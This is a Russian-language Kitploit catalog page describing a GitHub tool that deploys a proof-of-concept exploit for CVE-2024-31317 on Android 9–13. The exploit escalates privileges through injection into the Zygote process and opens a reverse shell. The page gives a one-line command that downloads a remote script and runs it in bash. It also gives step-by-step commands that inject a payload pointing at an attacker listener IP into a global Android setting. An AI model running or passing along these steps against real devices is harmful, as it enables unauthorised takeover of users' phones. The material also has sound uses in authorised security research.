Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-31317-PoC-Deployer — Инструмент автоматического развертывания PoC для CVE-2024-31317 на Android 9-13, обеспечивающий повышение привилегий через внедрение в Zygote и выполнение reverse shell. | Kitploit
Инструменты/GitHubGitHub/webldix/cve-2024-31317-poc-deployer
Безопасность AndroidПовышение привилегийЭксплуатацияШелл-кодТестирование на ПроникновениеМобильная безопасностьРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
webldix/cve-2024-31317-poc-deployer

CVE-2024-31317-PoC-Deployer

Инструмент автоматического развертывания PoC для CVE-2024-31317 на Android 9-13, обеспечивающий повышение привилегий через внедрение в Zygote и выполнение reverse shell.

Репозиторий
528671 год назадПроверено Kitploit

CVE-2024-31317-PoC-Deployer

Android Version Patch Level License

Инструмент развертывания proof-of-concept для CVE-2024-31317, нацеленный на устройства Android с версиями 9–13.

📝 Описание проекта

CVE-2024-31317-PoC-Deployer — это автоматизированный сценарий развертывания для быстрой генерации и настройки всех файлов, необходимых для эксплуатации уязвимости CVE-2024-31317. Уязвимость затрагивает устройства Android 9–13, позволяя повышать привилегии и выполнять произвольный код через процесс Zygote.

🚨 Информация об уязвимости

  • CVE ID: CVE-2024-31317
  • Затронутые версии: Android 9 – Android 13
  • Исправленная версия: Версии Android с патчем июня 2024 года и новее
  • Тип уязвимости: Инъекция команд в процесс Zygote
  • Необходимые разрешения: WRITE_SECURE_SETTINGS

📦 Включенные файлы

  • reverse_shell.c — обратный шелл на языке C
  • payload.txt — специально сконструированный эксплойт-пейлоад
  • compile.sh — автоматический сценарий компиляции
  • README.txt — подробная инструкция по использованию
  • CVE-2024-31317.txt — технический анализ уязвимости

🛠️ Быстрый старт

  1. Запустите удаленный сценарий развертывания:

    root@kitploit:~
    pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
    
  2. Скомпилируйте обратный шелл:

    root@kitploit:~
    sh compile.sh
    
  3. Запустите слушатель обратного шелла:

    root@kitploit:~
    sh reverse_shell
    

💣 Шаги эксплуатации

  1. Загрузите payload.txt в /data/local/tmp/ на целевом устройстве
  2. Замените xxx.xxx.xxx в payload.txt на IP-адрес вашего сервера-прослушивателя
  3. Выполните на целевом устройстве следующую последовательность команд:
    root@kitploit:~
    am force-stop com.android.settings
    cd /data/local/tmp/
    settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
    am start -n com.android.settings/.Settings
    settings put global hidden_api_blacklist_exemptions "null"
    

⚠️ Отказ от ответственности

Данный инструмент предназначен только для законного тестирования безопасности и исследовательских целей. Перед использованием необходимо получить явное разрешение от владельца целевой системы. Несанкционированное использование может противоречить законодательству. Разработчик не несет ответственности за любые злоупотребления.

📜 Лицензия

Этот проект распространяется под лицензией MIT — подробнее см. в файле LICENSE.

📚 Технические ссылки

  • Android Security Bulletin – June 2024
  • CVE-2024-31317 Details
Скачать инструмент